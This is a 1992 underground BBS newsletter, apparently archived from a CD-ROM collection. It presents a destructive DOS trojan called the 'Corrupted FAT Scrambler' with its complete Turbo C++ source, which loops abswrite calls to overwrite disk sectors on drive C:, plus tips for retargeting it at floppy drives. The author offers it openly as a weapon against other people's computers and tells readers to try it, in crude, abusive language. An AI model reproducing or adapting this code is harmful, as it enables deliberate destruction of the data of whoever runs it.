home *** CD-ROM | disk | FTP | other *** search
-
- ╔═════════════════════════════════════════════════════════════════════════════╗
- ║ ─────────────────────── ▀▄ █ █▀▀▀█ █▀▀▀▀ ────────────────────────────── ║
- ║ ───────────────────────── ▀▄ █ █ █ █▄▄▄▄ ────────────────────────────── ║
- ║ ─────────────────────────── ▀▄ █ █▀▀▀█ █ ────────────────────────────── ║
- ║ ───────────────────────────── ▀█ █ █ ▄▄▄▄█ ────────────────────────────── ║
- ╠═════════════════════════════════════════════════════════════════════════════╣
- ║ Vaginal and Anal Secretions Newsletter #0074 ║
- ╟─────────────────────────────────────────────────────────────────────────────╢
- ║ Date Released : [08/05/92] Author: CorrupTor -CTD- ║
- ╟─────────────────────────────────────────────────────────────────────────────╢
- ║ The Corrupted FAT Scrambler Trojan ║
- ╙─────────────────────────────────────────────────────────────────────────────╜
-
- This is one of my shortest & simple trojans, therefore you should be
- able to understand how it works. It's called the Corrupted Fat Scrambler
- 1.0. First of all, I'm not responsible for destruction of your computer
- data or anyone elses.. I only promote this on NaZi-PiG/Punk-Bastard's
- Computers...
-
- Okay, First of all, Make sure you have a copy of Borland's Turbo C++.
- This Trojan was compiled in Turbo C++ v1.01!!!!!!! Jesus! It should
- work on any newer versions of Turbo C++.
-
- I have put REM statements out beside each command to tell you what
- the fuck it does incase you still don't understand what it does.
-
-
- -----------------------------------------------------------------------------
-
- { Corrupted Fat Scrambler }
-
- #include <stdlib.h> { Duh, Include Filez }
- #include <stdio.h>
- #include <conio.h>
- #include <process.h>
- #include <dos.h>
- #include <time.h>
- main() { Start of Main Program }
- {
- int i; { sets up a variable, Duh }
- clrscr(); { Clears Screen }
- randomize(); { Sets up thing so I can randomize the i Var. }
- for(i=0;i<666;i++) { Defines loop of 666 }
- abswrite(2, i, i, 0); { Readz & Writez Absolute Sectors Randomly! on C: }
- printf("Get PHuCKED!"); { Text Displayed to NaZi-PiG }
- return(0); { Returns 0 Value }
- }
-
- -----------------------------------------------------------------------------
-
- Okay, What it does is picks a random sector to start writing Shit, and
- a ramdom number of sectors to write! If you want to shorten the number
- of timez it loops just change the 666 to like 100.. Since 666 will take
- a long time to finish. You can also try this Monster out on a Floppy
- drive. Change the 2 in the Abswrite command to '0' for A:, and '1' for B:
-
- Go ahead, try it out. You'll be very pleased with its results! Throw
- some shit on the old floppy drive, and run the trojan to do A: or B:
- When you are done go the A:, look at it, then do chkdsk /F, and check
- it out! If you really wanna be thrilled, Make a directory after that!
- It really Phucks your Floppy up! Of course you can reformat it... Duh!
-
-
- This Text has been created and brought to you by Corruptor.
-
- Call The Underworld Legacy
- - SuiCiDaL SynDRoME, P.i.N. Node #2 -
- - TOXiC AVD HQ! / CTD HQ! -
- 717.566.575o
- NUP:NOLAMERS
-
- ───═════[ VaS DiSTRiBuTioN SiTeS ]═════───
- ╔═════════════════════════════════════════════════════════════════════════════╗
- ║ BBS Name Number Baud Sysop Title ║
- ╟─────────────────────────────────────────────────────────────────────────────╢
- ║ LiVe WiRE BBS (313)464-1470 14.4 Studmuffin World HQ ║
- ║ Floating Pancreas (305)551-0311 14.4 Majestic Cockster Dist. #1 ║
- ║ Midian BBS (703)790-8048 14.4 The Raging Golemn Dist. #2 ║
- ║ CHaoTiC BeHaVioR (717)652-7096 16.8 Chaos Dist. #3 ║
- ╟─────────────────────────────────────────────────────────────────────────────╢
- ║ VaS Voice Mail Box ... (313) 910-3030 ... Toll Free In Michigan! ║
- ╟─────────────────────────────────────────────────────────────────────────────╢
- ║ Studmuffin can be reached via internet at the address: dmitchel@ais.org ║
- ╟─────────────────────────────────────────────────────────────────────────────╢
- ║ And To Reach us Via U.S. Mail, Send Letters To: ║
- ║ VaS World Headquarters ║
- ║ P.O. Box 530768 ║
- ║ Livonia,MI 48153 ║
- ╚═════════════════════════════════════════════════════════════════════════════╝
-
-
-